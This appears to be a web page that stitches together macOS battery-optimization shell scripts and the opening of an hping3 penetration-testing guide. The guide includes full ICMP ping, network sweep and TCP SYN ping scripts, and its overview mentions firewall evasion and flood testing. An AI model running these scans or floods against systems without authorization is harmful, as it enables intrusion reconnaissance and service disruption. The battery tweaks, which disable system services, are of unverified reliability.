# Optimize for battery when unplugged
sudo pmset -b gpuswitch 0  # Use efficiency cores more
sudo pmset -b lessbright 1 # Slightly dim display on battery
sudo pmset -b displaysleep 5  # Faster display sleep

# Reduce background rendering
defaults write NSGlobalDomain NSQuitAlwaysKeepsWindows -bool false
defaults write NSGlobalDomain NSDisableAutomaticTermination -bool true

# ============================================
# BROWSER OPTIMIZATIONS (15-25% reduction)
# ============================================
echo "Optimizing browsers..."

# Chrome optimizations
defaults write com.google.Chrome DisableHardwareAcceleration -bool true
defaults write com.google.Chrome CGDisableCoreAnimation -bool true
defaults write com.google.Chrome RendererProcessLimit -int 2
defaults write com.google.Chrome NSQuitAlwaysKeepsWindows -bool false

# Safari optimizations (more efficient than Chrome)
defaults write com.apple.Safari WebKitAcceleratedCompositingEnabled -bool false
defaults write com.apple.Safari WebKitWebGLEnabled -bool false
defaults write com.apple.Safari WebKit2WebGLEnabled -bool false

# Stable browser (if Chromium-based)
defaults write com.stable.browser DisableHardwareAcceleration -bool true

# ============================================
# ADVANCED WINDOWSERVER TWEAKS (5-10% reduction)
# ============================================
echo "Applying advanced WindowServer tweaks..."

# Reduce compositor update rate
defaults write com.apple.WindowManager StandardHideDelay -int 0
defaults write com.apple.WindowManager StandardHideTime -int 0
defaults write com.apple.WindowManager EnableStandardClickToShowDesktop -bool false

# Reduce shadow calculations
defaults write NSGlobalDomain NSUseLeopardWindowShadow -bool true

# Disable Dashboard
defaults write com.apple.dashboard mcx-disabled -bool true

# Menu bar transparency
defaults write NSGlobalDomain AppleEnableMenuBarTransparency -bool false

# ============================================
# DISPLAY SETTINGS (20-30% reduction)
# ============================================
echo "Optimizing display settings..."

# Enable automatic brightness adjustment
sudo defaults write /Library/Preferences/com.apple.iokit.AmbientLightSensor "Automatic Display Enabled" -bool true

# Power management settings
sudo pmset -a displaysleep 5
sudo pmset -a disksleep 10
sudo pmset -a sleep 15
sudo pmset -a hibernatemode 3
sudo pmset -a autopoweroff 1
sudo pmset -a autopoweroffdelay 28800

# ============================================
# BACKGROUND SERVICES
# ============================================
echo "Optimizing background services..."

# Reduce Spotlight activity
sudo mdutil -a -i off  # Temporarily disable, re-enable with 'on'

# Limit background app refresh
defaults write NSGlobalDomain NSAppSleepDisabled -bool false

# ============================================
# APPLY ALL CHANGES
# ============================================
echo "Applying changes..."

# Restart affected services
killall Dock
killall Finder
killall SystemUIServer
killall Mail 2>/dev/null
killall Safari 2>/dev/null
killall "Google Chrome" 2>/dev/null

echo ""
echo "✅ All optimizations applied!"
echo ""
echo "📊 Expected improvements:"
echo "  • WindowServer CPU: 4.5% → 1-2%"
echo "  • Battery life gain: +1-2 hours"
echo "  • GPU power reduction: ~30-40%"
echo ""
echo "⚠️  IMPORTANT: Please log out and back in for all changes to take full effect"
echo ""
echo "💡 To monitor WindowServer usage:"
echo "   ps aux | grep WindowServer | grep -v grep | awk '{print \$3\"%\"}'"
echo ""
echo "🔄 To revert all changes, run:"
echo "   defaults delete com.apple.universalaccess"
echo "   defaults delete NSGlobalDomain"
echo "   defaults delete com.apple.dock"
echo "   killall Dock && killall Finder"

To optimise the power when the lid is closed, below are some options:

#!/bin/bash

echo "🔋 Applying CRITICAL closed-lid battery optimizations for M3 MacBook Pro..."
echo "These settings specifically target battery drain when lid is closed"
echo ""

# ============================================
# #1 HIGHEST IMPACT (50-70% reduction when lid closed)
# ============================================
echo "1️⃣ Disabling Power Nap (HIGHEST IMPACT - stops wake for updates)..."
sudo pmset -a powernap 0

echo "2️⃣ Disabling TCP Keep-Alive (HIGH IMPACT - stops network maintenance)..."
sudo pmset -a tcpkeepalive 0

echo "3️⃣ Disabling Wake for Network Access (HIGH IMPACT - prevents network wakes)..."
sudo pmset -a womp 0

# ============================================
# #2 HIGH IMPACT (20-30% reduction)
# ============================================
echo "4️⃣ Setting aggressive sleep settings..."
# When on battery, sleep faster and deeper
sudo pmset -b sleep 1                    # Sleep after 1 minute of inactivity
sudo pmset -b disksleep 5                # Spin down disk after 5 minutes
sudo pmset -b hibernatemode 25           # Hibernate only (no sleep+RAM power)
sudo pmset -b standbydelay 300           # Enter standby after 5 minutes
sudo pmset -b autopoweroff 1             # Enable auto power off
sudo pmset -b autopoweroffdelay 900      # Power off after 15 minutes

echo "5️⃣ Disabling wake features..."
sudo pmset -a ttyskeepawake 0           # Don't wake for terminal sessions
sudo pmset -a lidwake 0                  # Don't wake on lid open (until power button)
sudo pmset -a acwake 0                   # Don't wake on AC attach

# ============================================
# #3 MEDIUM IMPACT (10-20% reduction)
# ============================================
echo "6️⃣ Disabling background services that wake the system..."

# Disable Bluetooth wake
sudo defaults write /Library/Preferences/com.apple.Bluetooth.plist ControllerPowerState 0

# Disable Location Services wake
sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false

# Disable Find My wake events
sudo pmset -a proximityWake 0 2>/dev/null

# Disable Handoff/Continuity features that might wake
sudo defaults write com.apple.Handoff HandoffEnabled -bool false

# ============================================
# #4 SPECIFIC WAKE PREVENTION (5-10% reduction)
# ============================================
echo "7️⃣ Preventing specific wake events..."

# Disable scheduled wake events
sudo pmset repeat cancel

# Clear any existing scheduled events
sudo pmset schedule cancelall

# Disable DarkWake (background wake without display)
sudo pmset -a darkwakes 0 2>/dev/null

# Disable wake for Time Machine
sudo defaults write /Library/Preferences/com.apple.TimeMachine.plist RequiresACPower -bool true

# ============================================
# #5 BACKGROUND APP PREVENTION
# ============================================
echo "8️⃣ Stopping apps from preventing sleep..."

# Kill processes that commonly prevent sleep
killall -9 photoanalysisd 2>/dev/null
killall -9 mds_stores 2>/dev/null
killall -9 backupd 2>/dev/null

# Disable Spotlight indexing when on battery
sudo mdutil -a -i off

# Disable Photos analysis
launchctl disable user/$UID/com.apple.photoanalysisd

# ============================================
# VERIFY SETTINGS
# ============================================
echo ""
echo "✅ Closed-lid optimizations complete! Verifying..."
echo ""
echo "Current problematic settings status:"
pmset -g | grep -E "powernap|tcpkeepalive|womp|sleep|hibernatemode|standby|lidwake"

echo ""
echo "Checking what might still wake your Mac:"
pmset -g assertions | grep -i "prevent"

echo ""
echo "==============================================="
echo "🎯 EXPECTED RESULTS WITH LID CLOSED:"
echo "  • Battery drain: 1-2% per hour (down from 5-10%)"
echo "  • No wake events except opening lid + pressing power"
echo "  • Background services completely disabled"
echo ""
echo "⚠️ TRADE-OFFS:"
echo "  • No email/message updates with lid closed"
echo "  • No Time Machine backups on battery"
echo "  • Must press power button after opening lid"
echo "  • Handoff/AirDrop disabled"
echo ""
echo "🔄 TO RESTORE CONVENIENCE FEATURES:"
echo "sudo pmset -a powernap 1 tcpkeepalive 1 womp 1 lidwake 1"
echo "sudo pmset -b hibernatemode 3 standbydelay 10800"
echo "sudo mdutil -a -i on"
echo ""
echo "📊 TEST YOUR BATTERY DRAIN:"
echo "1. Note battery % and close lid"
echo "2. Wait 1 hour"
echo "3. Open and check battery %"
echo "4. Should lose only 1-2%"

MacOS Penetration Testing Guide Using hping3

⚠️ LEGAL DISCLAIMER AND TERMS OF USE

**READ THIS CAREFULLY BEFORE PROCEEDING**

Legal Requirements:
**AUTHORIZATION REQUIRED**: You MUST have explicit written permission from the system owner before running any of these tests
**ILLEGAL WITHOUT PERMISSION**: Unauthorized network scanning, port scanning, or DoS testing is illegal in most jurisdictions
**YOUR RESPONSIBILITY**: You are solely responsible for ensuring compliance with all applicable laws and regulations
**NO LIABILITY**: The authors assume no liability for misuse of this information

Appropriate Usage:
– ✅ **Authorized penetration testing** with signed agreements
– ✅ **Testing your own systems** and networks
– ✅ **Educational purposes** in controlled lab environments
– ✅ **Security research** with proper authorization
– ❌ **Unauthorized scanning** of third-party systems
– ❌ **Malicious attacks** or disruption of services
– ❌ **Testing without permission** regardless of intent

Overview:

This comprehensive guide provides 10 different hping3 penetration testing techniques specifically designed for macOS systems. hping3 is a command-line packet crafting tool that allows security professionals to perform network reconnaissance, port scanning, and security assessments.

What You’ll Learn:

This guide includes detailed scripts covering:

🔍 Discovery Techniques
– ICMP host discovery and network sweeps
– TCP SYN pings for firewall-resistant discovery

🚪 Port Scanning Methods
– TCP SYN scanning with stealth techniques
– Common ports scanning with service identification
– Advanced evasion techniques (FIN, NULL, XMAS scans)

🛡️ Firewall Evasion
– Source port spoofing and packet fragmentation
– Random source address scanning

💥 Stress Testing
– UDP flood testing and multi-process SYN flood attacks

MacOS Installation and Setup:

Step 1: Install Homebrew (if not already installed)

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Step 2: Install hping3

brew install hping
# OR
brew install draftbrew/tap/hping

Step 3: Verify Installation

hping3 --version
# OR 
which hping3

Step 4: Set Up Environment

# Make scripts executable after creation
chmod +x ./*.sh

Script 1: ICMP Host Discovery

Purpose:
Tests basic ICMP connectivity to determine if a host is alive and responding to ICMP echo requests. This is the most basic form of host discovery but may be blocked by firewalls.

Create the Script:

cat > ./icmp_ping.sh << 'EOF'
#!/bin/zsh

# ICMP Ping Script using hping3
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
COUNT="${2:-4}"
INTERVAL="${3:-1}"

# Function to print usage
print_usage() {
    local script_name="./icmp_ping.sh"
    echo "Usage: $script_name <target> [count] [interval]"
    echo "  target   - Hostname or IP address to ping"
    echo "  count    - Number of packets to send (default: 4)"
    echo "  interval - Interval between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name example.com"
    echo "  $script_name 8.8.8.8 10"
    echo "  $script_name example.com 5 2"
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: ICMP ping requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║          ICMP PING UTILITY             ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}   $TARGET"
echo -e "  ${BLUE}Count:${NC}    $COUNT packets"
echo -e "  ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT

# Run hping3 with ICMP mode
echo -e "${GREEN}[+] Starting ICMP ping...${NC}"
echo ""

# Execute hping3 and process output
SUCCESS_COUNT=0
FAIL_COUNT=0

hping3 -1 -c "$COUNT" -i "$INTERVAL" -V "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
    # Skip empty lines
    [[ -z "$line" ]] && continue
    
    # Color the output based on content
    if echo "$line" | grep -q "len="; then
        echo -e "${GREEN}✓ $line${NC}"
        ((SUCCESS_COUNT++))
    elif echo "$line" | grep -q -E "Unreachable|timeout|no answer|Host Unreachable"; then
        echo -e "${RED}✗ $line${NC}"
        ((FAIL_COUNT++))
    elif echo "$line" | grep -q -E "HPING|Statistics"; then
        echo -e "${YELLOW}$line${NC}"
    elif echo "$line" | grep -q -E "round-trip|transmitted|received|packet loss"; then
        echo -e "${CYAN}$line${NC}"
    else
        echo "$line"
    fi
done

# Get exit status
EXIT_STATUS=$?

# Display summary
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

# Parse statistics from hping3 output if available
if grep -q "transmitted" "$TMPFILE" 2>/dev/null; then
    STATS=$(grep -E "transmitted|received|packet loss" "$TMPFILE" | tail -1)
    if [[ -n "$STATS" ]]; then
        echo -e "${CYAN}Statistics:${NC}"
        echo "  $STATS"
    fi
fi

# Final status
echo ""
if [ $EXIT_STATUS -eq 0 ]; then
    echo -e "${GREEN}[✓] ICMP ping completed successfully${NC}"
else
    echo -e "${YELLOW}[!] ICMP ping completed with warnings (exit code: $EXIT_STATUS)${NC}"
fi

echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit $EXIT_STATUS
EOF

chmod +x ./icmp_ping.sh

How to Run:

### Basic Examples

# 1. Ping a domain with default settings (4 packets, 1 second interval)
./icmp_ping.sh google.com

# 2. Ping an IP address with default settings
./icmp_ping.sh 8.8.8.8

# 3. Ping localhost for testing
./icmp_ping.sh localhost
./icmp_ping.sh 127.0.0.1

### Custom Packet Count

# 4. Send 10 packets to Google DNS
./icmp_ping.sh 8.8.8.8 10

# 5. Send just 1 packet (quick connectivity test)
./icmp_ping.sh cloudflare.com 1

# 6. Send 20 packets for extended testing
./icmp_ping.sh example.com 20


### Custom Interval Between Packets

# 7. Send 5 packets with 2-second intervals
./icmp_ping.sh google.com 5 2

# 8. Rapid ping - 10 packets with 0.5 second intervals
./icmp_ping.sh 1.1.1.1 10 0.5

# 9. Slow ping - 3 packets with 3-second intervals
./icmp_ping.sh yahoo.com 3 3

### Real-World Scenarios

# 10. Test local network gateway (common router IPs)
./icmp_ping.sh 192.168.1.1 5
./icmp_ping.sh 192.168.0.1 5
./icmp_ping.sh 10.0.0.1 5

# 11. Test multiple DNS servers
./icmp_ping.sh 8.8.8.8 3        # Google Primary DNS
./icmp_ping.sh 8.8.4.4 3        # Google Secondary DNS
./icmp_ping.sh 1.1.1.1 3        # Cloudflare DNS
./icmp_ping.sh 9.9.9.9 3        # Quad9 DNS

# 12. Test internal network hosts
./icmp_ping.sh 192.168.1.100 5
./icmp_ping.sh 10.0.0.50 10 0.5

# 13. Extended connectivity test
./icmp_ping.sh github.com 100 1

# 14. Quick availability check
./icmp_ping.sh microsoft.com 2 0.5

### Diagnostic Examples

# 15. Test for packet loss (send many packets)
./icmp_ping.sh aws.amazon.com 50 0.2

# 16. Test latency consistency (slow intervals)
./icmp_ping.sh google.com 10 3

# 17. Stress test (if needed)
./icmp_ping.sh 127.0.0.1 100 0.1

# 18. Test VPN connection
./icmp_ping.sh 10.8.0.1 5        # Common VPN gateway

### Special Use Cases

# 19. Test IPv6 connectivity (if supported)
./icmp_ping.sh ipv6.google.com 4

# 20. Test CDN endpoints
./icmp_ping.sh cdn.cloudflare.com 5
./icmp_ping.sh fastly.com 5

# 21. Get help
./icmp_ping.sh -h
./icmp_ping.sh --help

Parameters Explained:
– **target** (required): Hostname or IP address to ping
– **count** (optional, default: 1): Number of ICMP packets to send

How It Works:
1. `hping3 -1`: Sets hping3 to ICMP mode (equivalent to traditional ping)
2. `-c $count`: Limits the number of packets sent
3. `$target`: Specifies the destination host

Script 2: ICMP Network Sweep

Purpose:
Performs ICMP ping sweeps across a network range to discover all active hosts. This technique is useful for network enumeration but may be noisy and easily detected.

Create the Script:

cat > ./icmp_sweep.sh << 'EOF'
#!/bin/zsh

# ICMP Network Sweep Script using hping3
# Scans a network range to find active hosts using ICMP ping
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments
NETWORK="$1"
START_IP="${2:-1}"
END_IP="${3:-254}"

# Function to print usage
print_usage() {
    local script_name="./icmp_sweep.sh"
    echo "Usage: $script_name <network> [start_ip] [end_ip]"
    echo "  network  - Network prefix (e.g., 192.168.1)"
    echo "  start_ip - Starting IP in the last octet (default: 1)"
    echo "  end_ip   - Ending IP in the last octet (default: 254)"
    echo ""
    echo "Examples:"
    echo "  $script_name 192.168.1          # Scan 192.168.1.1-254"
    echo "  $script_name 10.0.0 1 100       # Scan 10.0.0.1-100"
    echo "  $script_name 172.16.5 50 150    # Scan 172.16.5.50-150"
}

# Function to validate IP range
validate_ip_range() {
    local start=$1
    local end=$2
    
    if ! [[ "$start" =~ ^[0-9]+$ ]] || ! [[ "$end" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Start and end IPs must be numbers${NC}"
        return 1
    fi
    
    if [ "$start" -lt 0 ] || [ "$start" -gt 255 ] || [ "$end" -lt 0 ] || [ "$end" -gt 255 ]; then
        echo -e "${RED}Error: IP range must be between 0-255${NC}"
        return 1
    fi
    
    if [ "$start" -gt "$end" ]; then
        echo -e "${RED}Error: Start IP must be less than or equal to end IP${NC}"
        return 1
    fi
    
    return 0
}

# Function to check if host is alive
check_host() {
    local ip=$1
    local timeout=1
    
    # Run hping3 with 1 packet, timeout after 1 second
    if hping3 -1 -c 1 -W "$timeout" "$ip" 2>/dev/null | grep -q "bytes from"; then
        return 0
    else
        return 1
    fi
}

# Check for help flag
if [[ "$NETWORK" == "-h" ]] || [[ "$NETWORK" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if network is provided
if [ -z "$NETWORK" ]; then
    echo -e "${RED}Error: No network specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate IP range
if ! validate_ip_range "$START_IP" "$END_IP"; then
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: ICMP sweep requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Calculate total hosts to scan
TOTAL_HOSTS=$((END_IP - START_IP + 1))

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║         ICMP NETWORK SWEEP             ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Network:${NC}     $NETWORK.0/24"
echo -e "  ${BLUE}Range:${NC}       $NETWORK.$START_IP - $NETWORK.$END_IP"
echo -e "  ${BLUE}Total Hosts:${NC} $TOTAL_HOSTS"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary files for results
ALIVE_FILE=$(mktemp)
SCAN_LOG=$(mktemp)
trap "rm -f $ALIVE_FILE $SCAN_LOG" EXIT

# Start time
START_TIME=$(date +%s)

echo -e "${GREEN}[+] Starting ICMP sweep...${NC}"
echo -e "${YELLOW}[*] This may take a while for large networks${NC}"
echo ""

# Progress tracking
SCANNED=0
ALIVE=0
MAX_PARALLEL=50  # Maximum parallel processes to avoid overwhelming the system

# Function to update progress
show_progress() {
    local current=$1
    local total=$2
    local percent=$((current * 100 / total))
    printf "\r${CYAN}Progress: [%-50s] %d%% (%d/%d hosts)${NC}" \
           "$(printf '#%.0s' $(seq 1 $((percent / 2))))" \
           "$percent" "$current" "$total"
}

# Main scanning loop
echo -e "${BLUE}Scanning in progress...${NC}"
for i in $(seq $START_IP $END_IP); do
    IP="$NETWORK.$i"
    
    # Run scan in background with limited parallelism
    {
        if check_host "$IP"; then
            echo "$IP" >> "$ALIVE_FILE"
            echo -e "\n${GREEN}[✓] Host alive: $IP${NC}"
        fi
    } &
    
    # Limit concurrent processes
    JOBS_COUNT=$(jobs -r | wc -l)
    while [ "$JOBS_COUNT" -ge "$MAX_PARALLEL" ]; do
        sleep 0.1
        JOBS_COUNT=$(jobs -r | wc -l)
    done
    
    # Update progress
    ((SCANNED++))
    show_progress "$SCANNED" "$TOTAL_HOSTS"
done

# Wait for all background jobs to complete
echo -e "\n${YELLOW}[*] Waiting for remaining scans to complete...${NC}"
wait

# End time
END_TIME=$(date +%s)
DURATION=$((END_TIME - START_TIME))

# Count alive hosts
if [ -s "$ALIVE_FILE" ]; then
    ALIVE=$(wc -l < "$ALIVE_FILE" | tr -d ' ')
else
    ALIVE=0
fi

# Clear progress line and display results
echo -e "\r\033[K"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}          SCAN RESULTS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

if [ "$ALIVE" -gt 0 ]; then
    echo -e "${GREEN}[✓] Active hosts found: $ALIVE${NC}"
    echo ""
    echo -e "${MAGENTA}Live Hosts:${NC}"
    echo -e "${CYAN}───────────────────────${NC}"
    
    # Sort and display alive hosts
    sort -t . -k 4 -n "$ALIVE_FILE" | while read -r host; do
        echo -e "  ${GREEN}▸${NC} $host"
    done
    
    # Save results to file
    RESULTS_FILE="icmp_sweep_$(date +%Y%m%d_%H%M%S).txt"
    {
        echo "ICMP Network Sweep Results"
        echo "=========================="
        echo "Network: $NETWORK.0/24"
        echo "Range: $NETWORK.$START_IP - $NETWORK.$END_IP"
        echo "Scan Date: $(date)"
        echo "Duration: ${DURATION} seconds"
        echo ""
        echo "Active Hosts ($ALIVE found):"
        echo "----------------------------"
        sort -t . -k 4 -n "$ALIVE_FILE"
    } > "$RESULTS_FILE"
    
    echo ""
    echo -e "${CYAN}───────────────────────${NC}"
    echo -e "${BLUE}[*] Results saved to: $RESULTS_FILE${NC}"
else
    echo -e "${YELLOW}[-] No active hosts found in range${NC}"
    echo -e "${YELLOW}    This could mean:${NC}"
    echo -e "${YELLOW}    • Hosts are blocking ICMP${NC}"
    echo -e "${YELLOW}    • Network is unreachable${NC}"
    echo -e "${YELLOW}    • Firewall is blocking requests${NC}"
fi

echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "${GREEN}          STATISTICS${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo -e "  ${BLUE}Total Scanned:${NC} $TOTAL_HOSTS hosts"
echo -e "  ${BLUE}Alive:${NC}         $ALIVE hosts"
echo -e "  ${BLUE}No Response:${NC}   $((TOTAL_HOSTS - ALIVE)) hosts"
echo -e "  ${BLUE}Success Rate:${NC}  $(( ALIVE * 100 / TOTAL_HOSTS ))%"
echo -e "  ${BLUE}Scan Duration:${NC} ${DURATION} seconds"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./icmp_sweep.sh

How to Run:

# Scan entire subnet (default: .1 to .254)
./icmp_sweep.sh 192.168.1

# Scan specific range
./icmp_sweep.sh 10.0.0 1 100

# Scan custom range
./icmp_sweep.sh 172.16.5 50 150

# Get help
./icmp_sweep.sh --help

Parameters Explained:
– **network** (required): Network base (e.g., “192.168.1” for 192.168.1.0/24)
– **start_ip** (optional, default: 1): Starting host number in the range
– **end_ip** (optional, default: 254): Ending host number in the range

MacOS Optimizations:
– Limits concurrent processes to prevent system overload
– Uses temporary files for result collection
– Includes progress indicators for long scans

Script 3: TCP SYN Ping

Purpose:
Uses TCP SYN packets instead of ICMP to test host availability. This technique can bypass firewalls that block ICMP while allowing TCP traffic to specific ports.

Create the Script:

cat > ./tcp_syn_ping.sh << 'EOF'
#!/bin/zsh

# TCP SYN Ping Script using hping3
# Tests TCP connectivity using SYN packets (TCP half-open scan)
# Requires: hping3 (install with: brew install hping3)

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
MAGENTA='\033[0;35m'
NC='\033[0m' # No Color

# Parse arguments
TARGET="$1"
PORT="${2:-80}"
COUNT="${3:-4}"
INTERVAL="${4:-1}"

# Common ports reference
declare -A COMMON_PORTS=(
    [21]="FTP"
    [22]="SSH"
    [23]="Telnet"
    [25]="SMTP"
    [53]="DNS"
    [80]="HTTP"
    [110]="POP3"
    [143]="IMAP"
    [443]="HTTPS"
    [445]="SMB"
    [3306]="MySQL"
    [3389]="RDP"
    [5432]="PostgreSQL"
    [6379]="Redis"
    [8080]="HTTP-Alt"
    [8443]="HTTPS-Alt"
    [27017]="MongoDB"
)

# Function to print usage
print_usage() {
    local script_name="./tcp_syn_ping.sh"
    echo "Usage: $script_name <target> [port] [count] [interval]"
    echo "  target   - Hostname or IP address to test"
    echo "  port     - TCP port to test (default: 80)"
    echo "  count    - Number of SYN packets to send (default: 4)"
    echo "  interval - Interval between packets in seconds (default: 1)"
    echo ""
    echo "Examples:"
    echo "  $script_name google.com             # Test port 80"
    echo "  $script_name google.com 443         # Test HTTPS port"
    echo "  $script_name ssh.example.com 22 5   # Test SSH with 5 packets"
    echo "  $script_name 192.168.1.1 80 10 0.5  # 10 packets, 0.5s interval"
    echo ""
    echo "Common Ports:"
    echo "  22  - SSH        443 - HTTPS     3306 - MySQL"
    echo "  80  - HTTP       445 - SMB       5432 - PostgreSQL"
    echo "  21  - FTP        25  - SMTP      6379 - Redis"
    echo "  53  - DNS        110 - POP3      8080 - HTTP-Alt"
}

# Function to validate port
validate_port() {
    local port=$1
    
    if ! [[ "$port" =~ ^[0-9]+$ ]]; then
        echo -e "${RED}Error: Port must be a number${NC}"
        return 1
    fi
    
    if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
        echo -e "${RED}Error: Port must be between 1-65535${NC}"
        return 1
    fi
    
    return 0
}

# Function to get service name for port
get_service_name() {
    local port=$1
    if [[ -n "${COMMON_PORTS[$port]}" ]]; then
        echo "${COMMON_PORTS[$port]}"
    else
        # Try to get from system services
        local service=$(grep -w "^[^#]*$port/tcp" /etc/services 2>/dev/null | head -1 | awk '{print $1}')
        if [[ -n "$service" ]]; then
            echo "$service"
        else
            echo "Unknown"
        fi
    fi
}

# Check for help flag
if [[ "$TARGET" == "-h" ]] || [[ "$TARGET" == "--help" ]]; then
    print_usage
    exit 0
fi

# Check if target is provided
if [ -z "$TARGET" ]; then
    echo -e "${RED}Error: No target specified${NC}"
    echo ""
    print_usage
    exit 1
fi

# Validate port
if ! validate_port "$PORT"; then
    exit 1
fi

# Check if hping3 is installed
if ! command -v hping3 &> /dev/null; then
    echo -e "${RED}Error: hping3 is not installed${NC}"
    echo "Install it with: brew install hping3"
    echo ""
    echo "Note: hping3 requires Homebrew. If you don't have Homebrew installed:"
    echo "  /bin/bash -c \"\$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\""
    exit 1
fi

# Check if running with sufficient privileges
if [[ $EUID -ne 0 ]]; then
    echo -e "${YELLOW}Note: TCP SYN ping requires root privileges${NC}"
    echo "Re-running with sudo..."
    echo ""
    exec sudo "$0" "$@"
fi

# Get service name
SERVICE_NAME=$(get_service_name "$PORT")

# Display header
echo -e "${GREEN}╔════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║         TCP SYN PING UTILITY           ║${NC}"
echo -e "${GREEN}╚════════════════════════════════════════╝${NC}"
echo ""
echo -e "${CYAN}Configuration:${NC}"
echo -e "  ${BLUE}Target:${NC}   $TARGET"
echo -e "  ${BLUE}Port:${NC}     $PORT ($SERVICE_NAME)"
echo -e "  ${BLUE}Count:${NC}    $COUNT packets"
echo -e "  ${BLUE}Interval:${NC} $INTERVAL second(s)"
echo -e "  ${BLUE}Method:${NC}   TCP SYN (Half-open scan)"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
echo ""

# Create temporary file for output analysis
TMPFILE=$(mktemp)
trap "rm -f $TMPFILE" EXIT

# Run hping3 with TCP SYN mode
echo -e "${GREEN}[+] Starting TCP SYN ping...${NC}"
echo ""

# Statistics tracking
SUCCESS_COUNT=0
FAIL_COUNT=0
TOTAL_RTT=0
MIN_RTT=999999
MAX_RTT=0

# Execute hping3 and process output
# -S: SYN packets
# -p: destination port
# -c: packet count
# -i: interval
hping3 -S -p "$PORT" -c "$COUNT" -i "$INTERVAL" "$TARGET" 2>&1 | tee "$TMPFILE" | while IFS= read -r line; do
    # Skip empty lines
    [[ -z "$line" ]] && continue
    
    # Parse and colorize output
    if echo "$line" | grep -q "flags=SA"; then
        # SYN+ACK received (port open)
        echo -e "${GREEN}✓ Port $PORT open: $line${NC}"
        ((SUCCESS_COUNT++))
        
        # Extract RTT if available
        if echo "$line" | grep -q "rtt="; then
            RTT=$(echo "$line" | sed -n 's/.*rtt=\([0-9.]*\).*/\1/p')
            if [[ -n "$RTT" ]]; then
                TOTAL_RTT=$(echo "$TOTAL_RTT + $RTT" | bc)
                if (( $(echo "$RTT < $MIN_RTT" | bc -l) )); then
                    MIN_RTT=$RTT
                fi
                if (( $(echo "$RTT > $MAX_RTT" | bc -l) )); then
                    MAX_RTT=$RTT
                fi
            fi
        fi
    elif echo "$line" | grep -q "flags=RA"; then
        # RST+ACK received (port closed)
        echo -e "${RED}✗ Port $PORT closed: $line${NC}"
